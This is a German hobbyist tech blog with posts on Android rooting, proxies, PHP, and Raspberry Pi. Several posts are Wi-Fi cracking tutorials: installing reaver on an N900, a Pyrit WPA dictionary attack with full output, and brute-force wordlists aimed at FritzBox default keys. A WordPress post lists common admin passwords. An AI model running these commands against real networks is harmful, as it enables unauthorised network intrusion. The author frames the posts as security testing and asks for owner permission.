BurroTinto

Android dual sim Smartphones

Florian Klinger — Wed, 15 May 2013 10:34:05 +0000

Dual Sim und Android?

Hi, das Angebot der Mobilfunkanbieter ist ja mittlerweile gewaltig. Aber das Problem ist ja dabei überall gibt es einen Hacken. Beim einen ist das Telefonieren günstig aber Mobiles Internet unter aller Sau. Oder umgekehrt.

Da lohnt sich ein Handy das man mit zwei Sim-Karten füttern kann.

Ich hab mir mal Zeit genommen um eine kleine Liste zu erstellen um einen Überblick über die Smartphones zu bekommen die so auf dem Markt sind. Die ist natürlich nicht vollständig deshalb lade ich herzlichst zur Mitarbeit ein.

Hier mal die Liste:

Handy	Besonderheiten
	Samsung i9082 Galaxy Grand Dual-Core Prozessor Android 4.1 Farbdisplay (16 Mio. Farben, 800×480 Pixel, 5″, kapazitiver Touchscreen)
	Hero H2000+ Dual-Core Prozessor Android 4 Farbdisplay (2.6 Millionen Farben, 800 x 480 Pixel, kapazitativ Touchscreen, 4″) RAM: 512MB Unschlagbar Günstig
	Samsung Galaxy S Duos S7562 Android 4.0 4″ Bildschirm mit 16 Mio. Farben
	Alcatel One Touch 997D 4,3″ Bildschirm Android 4.0
	Sony Xperia E 3.5″ Bildschirm Android 4.1 (in Planung)
	Mobistel Cynus T2 5″ Bildschirm 12 MegapixelKamera Android 4.0 1 GHz Dual-Core Prozessor
	Phicomm i800 5″ Bildschirm 8 Megapixel Kamera und Frontkamera Android 4.0 1,2 GHz Dual-Core Prozessor 512MB RAM
	Phicomm i600 4,3″ Bildschirm 5 MegapixelKamera Android 4.0 1,2 GHz Dual-Core Prozessor

Wer kennt noch welche?

Wie man sieht gibt es schon einige. Aber das waren bestimmt noch nicht alle. Wer noch eines gefunden hat darf gerne nen Kommentar schreiben dann werde ich es in die Liste aufnehmen.

aircrack-ng mobile, mit dem Handy wpa, wpe und wps hacken.

Florian Klinger — Thu, 28 Mar 2013 08:53:32 +0000

Kann man mit dem Android oder iPhone WLAN Netzwerke hacken?

Die Antwort ist hier leider nein. Auf dem Galaxy S und dem Nexus 7 hab ich zwar aircrack-ng zum laufen gebracht. Aber Die Verbaute Netzwerkkarte kann weder injections noch ist sie zum monitor-mode fähig.
Aber es klappt trotzdem, und zar mit dem “alten” Nokia N900 Smartphone, das ich gerade vor mir habe, ist dies alles möglich. Sogar mit praktischer GUI namens “Cleven”

Installation von aircrack-ng

Das ist super einfach einfach in den Progr.-Manager gehen und dort cleven und Linux kernel for power user suchen.
Nach der Installation ist bis auf den reaverschon alles möglich.

reaver wps crack aufs N900 bringen

reaver und wash ist leider nicht in den repositorys enthalten. Kann aber leicht installiert werden.
Folgende 3 Dateien Downloaden und nach /opt/cleven/ kopieren
reaver
wash
reaver.db
oder gleich im xterminal des N900 folgendes eingeben:
1. Rootzugriff erhalten:

sudo gainroot

Dateien gleich in richtiges Verzeichnis Downloaden

wget -o /opt/cleven/reaver http://www.burrotinto.de/Android/reaver
wget -o /opt/cleven/wash http://www.burrotinto.de/Android/wash
wget -o /opt/cleven/reaver.db http://www.burrotinto.de/Android/reaver.db

und wer reaver und wash auch aus dem Terminal heraus nutzen will muss die drei Dateien nach /usr/bin kopieren.

tadadadaaaaaaaa

Jetzt kann auch von unterwegs die Sicherheit eines Wlannetzwerkes getestet werden.
Und nicht vergessen erst den Eigentümer des Netzes um Erlaubnis fragen. Ansonsten begeht man eine Straftat.

http input type=”image” value an php übergeben

Florian Klinger — Tue, 19 Mar 2013 13:53:27 +0000

Wie man value eines input type=”image” an php weitergibt

Ein Bild als Schaltfläche ist doch was schönes. Aber leider klappt die Übergabe eines Wertes mittels “value” nicht so einfach beim Internet Exporer. Aber das braucht man öfter mal wenn man z.B. eine id mitsenden will.

Lösung

Üblich wäre also

Aber da einige Browser das value nicht übermitteln kann man einen Umweg über ein array gehen.

nun kann man über key($_POST['id']) darauf zugreifen.

Beispiel:









var_export($_POST);
echo "
" . key($_POST['id']) . "";
?>

Wie man hier schön sieht werden auch die Koordinaten sauber übertragen und man kann auf diese zugreifen.

Beispiel mit sql Abfrage

Da man das wohl hauptsächlich mit Datenbanken braucht hier ein beispiel:

id . "][]' />
";
}

if (isset($_POST['id']))
{
$id = key($_POST['id']);
echo "Der Knopf Nummer: " . $id ." wurde gedrückt";
}
?>

Raspberry PI: ebay Sniper mit JBidwatcher ohne GUI

Florian Klinger — Mon, 04 Feb 2013 14:59:22 +0000

Cool auf Auktionen Snipen mit dem RASPBERRY PI

Seit neustem bin ich stolzer Besitzer eines RASPBERRY PI. Da fragt man sich was stellt man jetzt mit diese

m kleinen Wunderding an? Eine Möglichkeit ist z.B. der ein ebay Biet Sniper. Dank des super geringen Stromverbrauches kann man den RASPBERRY PI Tag und Nacht laufen lassen. Der JBidwatcher ist ein kleines Leichtgewicht unter den Snipern und deshalb hier gut zu gebrauchen. Aber nun zur Installation.

Die Abhängigkeiten `Xvfb` und `openjdk-6-jre` installieren

Da JBidwatcher ein JAVA Programm ist müssen wir Java installieren. Das Xvfb dient als “Virtueller” X-Server auf den wir JBidwatcher laufen lassen.

Wir Verbinden uns also per SSH zu unserm Raspberry auf dem Rasbian läuft und Installieren mit apt-get die Abhängigkeiten

sudo apt-get update && sudo apt-get install openjdk-6-jre xvfb

`Xvfb` Starten und Startscript erstellen

den X Window Virtual Framebuffer (abgekürzt Xvfb) zustarten giebt man diesen befehl ab:

Xvfb :1&

allerdings müsste man das bei jedem Systemstart machen. Daher kann man einen cronjob erstellen der dies tut.

EDITOR=nano sudo crontab -e

hier trägt man dann das hier ein:

@reboot  Xvfb :1&

Nicht vergessen, die letzte Zeile muss entweder ein # der ein Leerzeichen sein. Sonst gehts nicht.
Nano verlässt man mit Strg - X dann j und Enter.
Das wäre erledigt.

Jetzt kommt der JBidwatcher dran

Zuerst erstellen wir ein Verzeichniss

sudo mkdir /opt/jbidwatcher

und dorthin wechseln

cd /opt/jbidwatcher

und Downloaden JBidwatcher. Dazu auf http://www.jbidwatcher.com/ gehen und unter Downloads auf LINUX BINARY rechts klicken und “Adresse des Links kopieren” jetzt wieder wieder in der kommandozeile

sudo wget hier den link einfügen

schaut dann etwa so aus

sudo wget http://www.jbidwatcher.com/download/JBidwatcher-2.5.3pre3.jar

Und jetzt ist es schon installiert.

Probestart

Wir bauen eine Neue ssh Verbindung zum Raspberry PI auf, dieses mal mit X-Forwarding.

ssh -Y Hostname oder IP

jetzt JBidwatcher starten

java -jar /opt/jbidwatcher/JBidwatcher*.jar

Jetzt öffnet sich ein Fenster mit JBidwatcher.

Der letzt Schritt automatisch starten

UPDATE in KÜRZE

USB-Ethernet für das Nexus7 mit Cyanogenmod

Florian Klinger — Sat, 19 Jan 2013 14:09:18 +0000

Es ist doch möglich! – USB – Ethernet für das Nexus 7 mit Installiertem Cyanogenmod 10.1

Lange Zeit hab ich gesucht und ausprobiert wie man beim Nexus 7 LAN benutzen kann.
Mehrere Adapter und Kabel probiert… Erfolglos. Da im Kernel von Cyanogenmod keine Treiber für Ethernet Adapter installiert sind.

Aber die suche war dann doch noch erfolgreich und ich kann diese Zeilen schreiben mit einer Logitech K400
die zusammen mit dem Delock USB 2.0 Ethernet Adapter
an einem Delock USB 2.0 Ethernet Adapter
.

Geht echt super. Macht spass. Leider Frisst das Akku wie Schwein. Aber mir erstmal egal.

Installation

Die Installation ist denkbar einfach. Diesen Kernel herunterladen: Bricked_n7_v0.55.zip
Dieser wird dann im recovery geflasht.
Läuft über den schönen Aura Installer mit paar lustigen Texten und sehr vielen Einstellungsmöglichkeiten. Ich persönlich würd alles auf default lassen. Ist sicherer und das Nexus 7 hat schon ohne Übertaktung genug Power unter der Haube.

Hier nochmal die schritte:

Tablet ins recovery booten lassen.
zip flashen
Tablet normal starten lassen
Micro USB HOST OTG – Adapter
USB Ethernet dranstöpseln
LAN Kabel dran
Wenn Wlan an dann ausschalten ansonsten jetzt schon lossurfen

Wie man sieht ist das alles ganz einfach. Hoffentlich werden die Treiber auch bald in den Cyanogenmod Kernel integriert. Aber bis es soweit ist muss man halt bei jedem Update erneut den Kernel flashen.

VNC über USB für Android

Florian Klinger — Tue, 11 Dec 2012 13:19:10 +0000

Android Handy / Tablet über USB Fernsteuern

Es ist möglich und leicht realisierbar ein Android Gerät über die USB-Verbindung zum PC Fernzusteuern.
Man braucht nur 4 Sachen.

root
VNC-Server für Android
ADB
VNC-Viewer für den PC

1. root

Wie es für alle coolen Sachen für Android üblich ist braucht man auch hierfür ein Gerät mit Superuser-Rechten.
Hier im Blog gibt es Anleitungen wie man das beim Samsung Galaxy S i9000 und Nexus 7 macht. Ist das erledigt kann es weiter gehen.

2. VNC-Server für Android

Diesen kann man sich von Google-Play besorgen: VNC_server oder droid VNC server.
Oder einen anderen VNC-Server. Ist ziemlich egal.
Ist dieser dann installiert kann er geöffnet und gestartet werden. Jetzt kanns weiter gehen.

3. ADB

Anletung für Linux

Jetzt ist das Handy fertig und nun kommt der Rechner dran. In Linux ist es einfach.

Wir brauchen adb damit wir über das Datenkabel auf das Handy zugreifen können. adb ist sehr mächtig und wir benutzen es in unserem Fall den VNC-Port zum PC weiterzugeben.
adb hier herunterladen: ADB für linux
Jetzt diese ausführbar machen. Dazu Terminal starten und in das Downloadverzeichnis wechseln

cd Downloads

dann durch chmod ausführbar machen

chmod +x adb

jetzt noch ins PATH Verzeichniss /usr/local/bin verschieben das man es von überall öffnen kann.

sudo mv adb /usr/local/bin

Nun ist auch adb fertig eingerichtet. Und wir können mit der Port Weiterleitung beginnen:

adb forward tcp:5901 tcp:5901

so diese ist nun auch fertig. Nun kommen wir zum letzten Punkt.

4. VNC-Viewer für den PC

Jetzt kann man auf den VNC-Server zugreifen. Ich benutze den Tiger-VNC.
Oder man nimmt den REAL vnc. Der wird so Installiert:

sudo apt-get install vnc4server vnc-java

Aber egal welchen man von den beiden nimmt der Befehl bleibt der gleiche:

vncviewer localhost:5901

Jetzt solltet ihr euren Android Bildschirm vor euch sehen.

Herzlichen Glückwunsch.

Blitz für das Galaxy S

Florian Klinger — Tue, 11 Dec 2012 09:20:29 +0000

Blitz Cover für das geliebte Galaxy S i9000

Galaxy S mit Coverlight

Stefano Emidi, Designer des Coverlight, hat mich darauf hingewiesen das es zur Zeit eine crowdfunding campaign für eine Cover mit Blitz.
Schaut auf den ersten Blick wirklich gut aus. Und hebt das wirklich sehr gute Galaxy S in neue Sphären.
Mit dem neusten Cyanogenmod 10 Stable wo ich hier erkläre wie man es installiert steht es ja den aktuellen Handys um nichts nach. Nur Kommt die Kamera dank des Fehlenden Blitzes scheiße rüber.
Doch diese Lücke hat Stefano Emidi nun geschlossen. Dank seines Blitzes.

Hier kommt man zur Coverlight Kampagne und kann es auch gleich Vorbestellen.

Ich gebe dafür eine klare Kaufempfehlung und hoffe inständig das seine Kampagne von Erfolg gekrönt ist.

adb: error: insufficient permissions for device

Florian Klinger — Fri, 07 Dec 2012 07:33:15 +0000

Fehler beim Versuch Android mit adb zu Verbinden

Gerade hatte ich das Problem das die Verbindung zu meinem Nexus 7 nicht klappen wollte.
Diese FEhlermeldung wurde ausgegeben:

* daemon not running. starting it now *
* daemon started successfully *
error: insufficient permissions for device

Die Lösung ist die, man startet den Dienst einfach mal neu.
Erstmal Server beenden:

adb kill-server

dann wieder starten:

sudo adb start-server

Jetzt klappt es wieder.

NEXUS 7 Root mit Linux

Florian Klinger — Wed, 05 Dec 2012 08:59:49 +0000

Rooten eines Google NEXUS 7 in Linux

NEXUS 7 ein geiles Teil. Noch geiler mit root.

In Linux lässt es sich leicht und schnell ein Unlock machen und einen Rootrechte geben. Hier erfährst du wie. Ohne viel drumherum

Unlock NEXUS7

Zuerst in Linux Download :fastboot

NEXUS 7 im “fastboot” modus starten “Tastenkombination Power + Lautstärke runter”. Dann Terminal öffnen und in das Downloadverzeichnis wechseln und folgenden Befehl absetzen:

sudo ./fastboot-linux oem unlock

Ab hier werden alle Daten auf dem NEXUS 7 gelöscht und die Garantie kann verfallen!!!

Den Warnhinweis mit Yes bestätigen und danach Gerät neustarten.

Nun wird das NEXUS 7 gerootet

Beide nachfolgenden Dateien auf die SD-Card schieben:

Download :recovery-clockwork-touch-6.0.0.6-grouper.img

Download :CWM-SuperSU-v0.94.zip

NEXUS 7 wieder im “fastboot” modus starten “Tastenkombination Power + Lautstärke runter” und dieses mal diesen Befehl im Terminal ausführen:

sudo ./fastboot-linux flash recovery recovery-clockwork-touch-6.0.0.6-grouper.img

Nun im fastboot Modus mittels Lautstärketasten den recovery mode auswählen und durch drücken der Powertaste starten lassen.

Hier angelangt diese Schritte ausführen:

 -install zip from sdcard 
 -choose zip from sdcard 
 0/
 CWM-SuperSU-v0.94.zip 
 - Yes -Install CWM-SuperSU-v0.94.zip 
+++++Go Back+++++
reboot system now

Und fertig dein NEXUS 7 ist nun gerootet. Viel Spass damit

Ich übernehme keine Verantwortung über geschrottete Geräte, Datenverlust und mehr. Wer das hier macht tut es auf eigener Verantwortung!!!

Google Chrome mit Proxy Benutzen

Florian Klinger — Mon, 12 Nov 2012 07:14:18 +0000

Wie man den Google Chrome Browser mit einem nicht Systemweiten Proxy benutzt

Der Chrome Browser ist gut leider aber seine Proxy Einstellungen nicht. Da er nur auf den System proxy zurückgreift.
Will man aber einen anderen benutzen bleibt einen immer noch der Weg über die Kommandozeile.
Will man das einfach bewerkstelligen erstellt man eine Verknüpfung zur chrome.exe, diese bearbeitet man (Rechtsklick -> Eigenschaften) und fügt dort beim Reiter Verknüpfung im Feld Ziel hinter dem Pfad folgendes ein:

 --proxy-server=HOST:PORT

natürlich passt man das an seine Proxy Adresse an.

 --proxy-server=localhost:8123

so zum Beispiel

Alles im allem könnte es dann so aussehen:

C:\Users\Benutzername\AppData\Local\Google\Chrome\Application\chrome.exe --proxy-server=localhost:8123

apt-get proxy

Florian Klinger — Wed, 07 Nov 2012 06:51:02 +0000

apt-get durch Proxy benutzen

Damit man apt-get auch mit einem proxy betreiben kann muss man nur die /etc/apt/apt.conf mit folgenden Inhalt erstellen:

Acquire::http::Proxy "http://proxy.adresse.de:port"; 
Acquire::ftp::Proxy "http://proxy.adresse.de:port";

Natürlich müssen noch die proxy.adresse.de und port angepasst werden.

WordPress Sicherheit und admin wordlist

Florian Klinger — Fri, 19 Oct 2012 09:51:57 +0000

WordPress Sicherheit

Ist dein Blog gefährdet?

Ununterbrochen grasen Scripte im Internet Blogs ab um Seiten zu finden die Standard Passwörter oder sehr einfache Passwörter zum Schutz des Administrations Bereiches benutzen.

Derzeit wurde mit insgesamt 12577 Passwörten versucht sich Zutritt zu verschaffen.

Weil WordPress das am häufigsten benutzte CMS ist wird natürlich verstärkt danach gesucht.
Das ist so wie bei Betriebssystemen, Viren sind natürlich genauso bei Linux und Mac möglich. Da aber die meisten PC mit Windows laufen ist dieser wesentlich lukrativer.

Aber keine Angst man kann seine WordPress Sicherheit schon steigern.

Plugins

Zum beispiel kann man mit dem Plugin Limit Login Attempts Die Anzahl der Anmeldeversuche begrenzen.
Oder gar IP und IP bereiche mit WP-Ban Sperren. Nützlich wenn man dank Limit Login Attempts sieht dass immer eine bestimmte IP versucht sich Zutritt zu verschaffen.

Benutzername und Passwort

Das A und O eines Sicheren WordPress Blogs ist ein Gutes Passwort und ein Benutzername der NICHT admin ist. Den sollte man auf jeden Fall bei der Installation eines WordPress Blogs ändern.

Sicheres Passwort

Ein gutes Passwort besteht aus Mindestens 8 Zeichen, Buchstaben und Zeichen gemischt.
Aber solch sichere Passwörter sind schwer zu merken. Aber mit einer Esels Brücke geht das ganz leicht.
Man nimmt einen Satz oder Aussage die man sich leicht merken kann. Z.B.

Würde die 10 nicht nach der 9 kommen sondern 11 wäre alles Anders

Die Anfangsbuchstaben ergeben dann ein Ziemlich gutes Passwort: Wd10nnd9ks11waA
Und den Satz kann man sich leicht merken.

Benutzername

Wenn man schon admin als Benutzernamen verwendet oder verwenden will, sollte man um des fliegenden Spaghettimonster willen auf keinen Fall eines dieser Passwörter verwenden:

Die nachfolgende Passwort Liste wird ständig erweitert und basiert auf Aufzeichnungen diverser Blogs über versuchte Einbrüche.

Sortiert ist sie danach wie oft das Passwort benutzt wurde.

Nach Passwörtern suchen

Hier kannst du nach deinem eigenem Passwort suchen. Wenn es gefunden wurde sollte man auf jeden Fall SOFORT sein Passwort ändern!

Hier die Passwortliste

Gezeigt werden die 30 häufigsten Passwörter. Alle Passwörter gibt es hier zum Download (Rechtsklick, speichern unter)

#	Passwort	Häufigkeit
1	admin	0.4862 %
2	123456	0.3586 %
3	password	0.2948 %
4	12345	0.2948 %
5	1234567	0.2789 %
6	123123	0.2788 %
7	qwerty	0.2709 %
8	12345678	0.2708 %
9	abc123	0.2628 %
10	123456789	0.2549 %
11	1234	0.2548 %
12		0.207 %
13	111111	0.1991 %
14	123	0.199 %
15	admin123	0.199 %
16	secret	0.1911 %
17	trustno1	0.1672 %
18	qazwsx	0.1671 %
19	pass123	0.1671 %
20	pass	0.1671 %
21	administrator	0.1591 %
22	654321	0.1591 %
23	666666	0.1512 %
24	letmein	0.1512 %
25	test	0.1432 %
26	master	0.1432 %
27	7777777	0.1352 %
28	123qwe	0.1352 %
29	mustang	0.1352 %
30	welcome	0.1272 %

CyanogenMod 10 Nightly (Jelly Bean) für Galaxy S i9000

Florian Klinger — Mon, 20 Aug 2012 10:21:59 +0000

Endlich da CyanogenMod 10 Nightly

Nach langem warten ist es endlich da. Eine CyanogenMod 10 nightly Version. Spitze. Die wird doch gleich mal aufs Handy geflasht

Vorbereitung

Egal von welcher Version ihr stammt empfehle ich mit hiermit: Samsung Galaxy S i9000 Unbrick, unroot, werkszustand und wieder root mit Heimdall Das Handy zurückzusetzen.

Download

Alle Downloads von CM gibt es HIER da wir die aktuellste CM 10 nightly wollen passen wir auf das wir einen Download wählen der so heißt cm-10-XXXXXXXX-NIGHTLY-galaxysmtd.zip XXXXXXXX Ist der Platzhalter für das aktuellste Datum. Diese Datei dann aufs Handy schieben

Installation

Handy ausschalten und in den Recovery Modus booten lassen (Power, Menü und lauter Taste). Dann durch das Menü navigieren (Laut / leiser ist hoch / runter, Power ist auswählen)
wipe data/factory reset
Yes -- delete all user data
wipe cache partition
Yes - Wipe Cache
- install zip from sdcard
- choose zip from sdcard
cm-10-XXXXXXXX-NIGHTLY-galaxysmtd.zipp


- Yes - Install cm-10-XXXXXXXX-NIGHTLY-galaxysmtd.zip

reboot


Fertig
Google Apps
Wer Google Play und die andern Apps von Google möchte kann sie HIER HERUNTERLADEN und wie CyaogenMod über das Recovery aufs Handy flashen.


Fehler: status 7 bei der CyanogenMod Installation
Bei mir kam es einmal zu dieser Fehlermeldung, Lösen konnte ich dieses Problem indem ich im Recovery im letzten Menue Punkt. Auf die Recovery Version e3 wechselte. Dann Neustart ins Recovery, Factory reset, wipe und nun klappte die Installation.



Pyrit beschleunigung mit Cuda / OpenCL und Datenbank
Florian Klinger — Tue, 14 Aug 2012 08:52:13 +0000
Schneller WPA cracken mit Pyrit Cuda / OpenCL und SQLite
Wenn man ein mit WPA verschlüsseltes Netz cracken will braucht man viel Zeit, eine gute Wordlist und etwas Glück. Bei der Zeit kann man etwas nachhelfen, indem man die GPU mitbenutzt und Datenbanken erstellt.  Am meisten Geschwindigkeit bringt es den Prozessor der Grafikkarte zu benutzen. Hier ein Benchmark der Sapphire Radeon HD7970
root@Burrotinto:# pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (111897.3 PMKs/s)... \

Computed 111897.33 PMKs/s total.
#1: 'CAL++ Device #1 'AMD GPU DEVICE'': 113229.8 PMKs/s (RTT 1.1)
#2: 'CPU-Core (SSE2)': 723.0 PMKs/s (RTT 3.2)
#3: 'CPU-Core (SSE2)': 687.3 PMKs/s (RTT 2.9)
#4: 'CPU-Core (SSE2)': 724.3 PMKs/s (RTT 2.9)
Wie man sieht geht da einiges 113229.8 PMKs pro Sekunde schafft die Sapphire Radeon HD7970

Installation von Pyrit Cuda oder Pyrit OpenCL
Je nachdem welche Karte ihr verbaut habt, Cuda für nvidia und OpenCL für ATI.
Unter Arch Linux
Beide Pakete befinden sich im Arch User Repository. Wer yaourt installiert hat, hats einfach.
yaourt pyrit
Und die SVN Version für die eigene Grafikkarte auswählen und Installieren.
Andere Linux Distributionen
Erstmal folgendes runterladen

CPyrit-CUDA (für Nvidia-hardware): Version 0.3.0
CPyrit-OpenCL (für for compatible hardware): Version 0.3.0

Dann entpacken, ins Verzeichnis wechseln und folgendes ausführen.
python setup.py build
sudo python setup.py install
Jetzt ist pyritinstalliert und bereit.
 
Pyrit Datenbank benutzen
Pyrit kann in Datenbanken ESSIDs, Passwörter und den dazugehörigen Pairwise Master Keys speichern.
 
Vorbereitungen
Damit pyrit mit SQL überhaupt funktioniert brauchen wir SQLAlchemy das auch wieder unter Arch Linux über das Arch User Repository bezogen werden kann.
yaourt -S python2-sqlalchemy-0.6
Dann setzen wir unseren Speicherort für die Datenbank in der ~/.pyrit/config in z.B. sqlite:///pyritdb.db
default_storage = sqlite:///pyritdb.db
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients =
rpc_server = false
workunit_size = 75000
Zustand der Datenbank
Mit dem Commando pyrit eval kann man den zustand seiner Datenbank abfragen. Da sie ganz frisch ist sieht sie so aus:
user@archlinux ~ % pyrit eval

Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'sqlite:///pyritdb.db'...  connected.
Passwords available: 0

Befüllen der Datenbank
Da eine leere Datenbank wohl ziemlich blöd ist befüllen wir sie erst einmal. Der Befehl um Passwörter zu importieren ist hierfür:
pyrit -i PaSsWoRtLiStE import_passwords
Ich empfehle das BurroTinto Dictionary. 34,8 MB groß und umfasst 2788442 auf WPA zulässige Zeichen abgestimmte Passwörter. Hier gibts das zum Download: BurroTintoWPADictionary (rechtsklick, Ziel Speichern unter)
user@archlinux ~ % pyrit -i burrotintopassliste import_passwords
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'sqlite:///pyritdb.db'...  connected.
2788442 lines read. Flushing buffers.... .. 
All done.
Jetzt fehlen noch die ESSID’s für unsere Ziel Netzwerke.
pyrit -e 'FRITZ!Box WLAN 3270' create_essid
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'sqlite:///pyritdb.db'...  connected.
Created ESSID 'FRITZ!Box WLAN 3270
Jetzt fehlen nur noch unsere Pairwise Master Keys. Diese zu generieren dauert lange. Aber der Vorteil der Methode mit der Datenbank ist das man den Prozess jeder Zeit anhalten, beenden und wieder aufnehmen kann.
pyrit batch
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'sqlite:///pyritdb.db'...  connected.
Working on ESSID 'FRITZ!Box WLAN 3270'
Processed 15/256 workunits so far (5.9%); 1920 PMKs per second.

Angriff mit Pyrit Database
Um nun die Datenbank für einen angriff zu benutzen nimmt man diesen Befehl:
pyrit -r FRITZBoxWLAN3270.cap attack_db
Pyrit 0.4.1-dev (svn r308) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
 This code is distributed under the GNU General Public License v3+< Connecting to storage at 'sqlite:///pyritdb.db'... connected.
 Parsing file 'FRITZBoxWLAN3270.cap' (1/1)...
 Parsed 7 packets (7 802.11-packets), got 2 AP(s)
Picked AccessPoint 00:0b:86:c2:a4:79 ('linksys') automatically.
 Attacking handshake with Station 00:13:ce:55:98:sa...
 Tried 1639 PMKs so far (2.8%); 1577678 PMKs per second.
The password is 'www.BurroTinto.de'.

 



Virtualbox: failed: libQtCore.so.4: cannot open shared object file: No such file or directory
Florian Klinger — Tue, 14 Aug 2012 00:01:00 +0000
VirtualBox: supR3HardenedMainGetTrustedMain: dlopen(“/usr/lib/virtualbox/VirtualBox.so”,) failed: libQtCore.so.4: cannot open shared object file: No such file or directory
Fehler der beim Start von Virtualbox auftritt. Durch die Installation von qt gibt sich das wieder und VirtualBox lässt sich nun, ohne murren, starten.
pacman -S qt
modprobe vboxdrv
Noch ein kleiner Tipp. Damit modprobe vboxdrv nicht jedes mal von Hand eingegeben werden muss kann man modprobe vboxdrv in die /etc/rc.local schreiben. Dann wird es bei jedem Bootvorgang automatisch ausgeführt.
#!/bin/bash
#
# /etc/rc.local: Local multi-user start-up script.
#
modprobe vboxdrv



 



WPA Wordlist selbst erstellen. Wie der Brute Force erfolgreich wird.
Florian Klinger — Tue, 07 Aug 2012 12:18:17 +0000
Will man eine WPA Verschlüsselung knacken braucht man eine gute Wordlist
Gerd Altmann/Shapes:photoshopgraphics.com / pixelio.de
Doch woher nimmt man eine solche Passwortliste? In google wird man schnell fündig aber oft ist es nicht mit den gesuchten Zeichen.
Will man zum Beispiel das Wlan Netz einer mit Fritzbox cracken, bei dem das Standard Passwort noch gesetzt ist. (Das Werks mäßige Standard Passwort befindet sich auf der Unterseite der Fritzbox). Muss man wissen das dieses “nur” aus 16 Zahlen besteht.
Auch ist es möglich Listen mit jeder erdenklichen Kombination und Länge ohne großen Aufwand zu erstellen und diese gleich an pyrit weiterzugeben.
 

 
Erstellen von Passwortlisten
 
Mittels seq eine Datei erstellen
seq 1000000000000000 9999999999999999 > fritzboxwordlist
Hier werden alle Zahlen von 1000000000000000 bis 9999999999999999 in die Datei fritzboxwordlist geschrieben. Dauert ewig und braucht immensen Speicherplatz. Ungefähr 162124633789 MB!!!! Das entspricht 154614 TB!
 
seq ausgabe an pyrit mittels pipe weiterleiten
seq 1000000000000000 9999999999999999 >| pyrit -r Datei.cap -e "Netzwerkname" -i - attack_passthrough
Hier wird auch wieder eine Zahlensequenz erstellt, diese wird aber nicht in eine datei gespeichert sondern gleich an pyrit weitergereicht. Bei dieser Art des WPA Brute Force braucht man zwar weniger Speicherplatz aber trotzdem extrem viel Zeit.
 
Buchstaben Liste mit crunch erstellen
crunch 8 8 abcdefghijklmnopqrstuvwxyz > passwordlist
Werden aus allen Buchstaben eine Passwortliste erstellt wo jedes Wort genau 8 Zeichen lang ist und diese als passwordlist gespeichert. Diese wird 1792377 MB groß sein.
 
cruch Ausgabe an pyrit weiterreichen
crunch 8 63 '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#$%&()*+,-./:;<=>?@[\]^_`{|}~' | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough
Das ist ein Wahres Monster. Hiermit kann JEDER WPA key geknackt werden! Alle erlaubten Zahlen, Buchstaben und Sonderzeichen. Von einer Länge von 8 – 63 Zeichen. Da ist jedes erlaubte Passwort dabei. Die generierten Zeichen werden gleich an pyrit mittels einer pipe weitergereicht und dort entschlüsselt. Es entsteht ein Datenaufkommen von ca. 3930491 TB und wahrscheinlich wird man es selbst nicht erleben das man erfolgreich war.
 
Fazit: WPA Brute Force ist auf jeden Fall erfolgreich
Wie man sieht ist die WPA Verschlüsselung auch nicht das gelbe vom Ei. Aber wer ein nur kleines bisschen ausgefallenes Passwort hat sollte auf der sicheren Seite sein. Die Verbindung mittels Netzwerkkabel ist aber auf jeden Fall vorzuziehen da, von außen, unangreifbar und keine Strahlenbelastung.
Das herausfinden von WPA key’s kann durch Rainbow-Tables und guten Passwortlisten drastisch beschleunigt werden.
 

 



Linux: Freien Speicher anzeigen
Florian Klinger — Tue, 07 Aug 2012 08:19:49 +0000
Freien und belegten Speicherplatz der Partitionen anzeigen lassen
Manchmal will man doch wissen wie viel Speicherplatz gerade auf seiner Linux Maschine belegt ist.
Durch df ist das möglich. Es listet alle Partitionen und den Pfad auf wo sie eingehängt sind. Sehr praktisch.
df -hT

Bedeutung der df Schalter
-h Bedeutet human-readable und bedeutet das die Größe, für den Menschen lesbar, dargestellt wird

-T Listet auch den File Type auf
Ausgabe von df
root@archlinux ~ # df -hT
Filesystem     Type      Size  Used Avail Use% Mounted on
rootfs         rootfs    9.8G  5.7G  3.7G  61% /
dev            devtmpfs  968M     0  968M   0% /dev
run            tmpfs     969M  340K  969M   1% /run
/dev/sdb3      ext4      9.8G  5.7G  3.7G  61% /
shm            tmpfs     969M  232K  969M   1% /dev/shm
tmpfs          tmpfs     969M   93M  877M  10% /tmp
/dev/sdb1      ext2       96M   21M   71M  23% /boot
/dev/sdb4      ext4       20G   13G  6.1G  68% /home


 



Can’t find wireless tools, exiting.
Florian Klinger — Mon, 06 Aug 2012 05:37:13 +0000
Can’t find wireless tools, exiting.
Wer diese Fehlermeldung bekommt hat wohl keine wireless Tools auf seinem System installiert. Ich bekam diese Meldung bei der Benutzung von aircrack-ng auf Arch Linux.
Wie man aircrack-ng benutzt erfährst du hier. 
 
Installation der fehlenden wireless tools
 
auf Arch Linux
pacman - S wireless_tools
 
auf Debian, Ubuntu und ähnliche
net-tools
jetzt sind die benötigten Pakete installiert und können sofort benutzt werden.

Zum Beispiel mit dem Kommando
ifconfig

 



Anleitung: WEP verschlüsselte WLAN Netzwerke mit aircrack-ng cracken
Florian Klinger — Fri, 27 Jul 2012 21:34:52 +0000
Wie man mit aircrack-ng WEP Wlan Verschlüsselungen hackt
Zu aller erst, ich bin kein Freund von WLAN. Hohe Strahlenbelastung, unsicher und langsamer als Kabel. Ich greif lieber zum guten alten Netzwerkkabel.
Bevor wir also anfangen in unser heimisches WLAN Netzwerk einzubrechen muss man sicher gehn das es das EIGENE bzw. die Erlaubnis des Besitzers haben. Ansonsten begeht man eine Straftat.
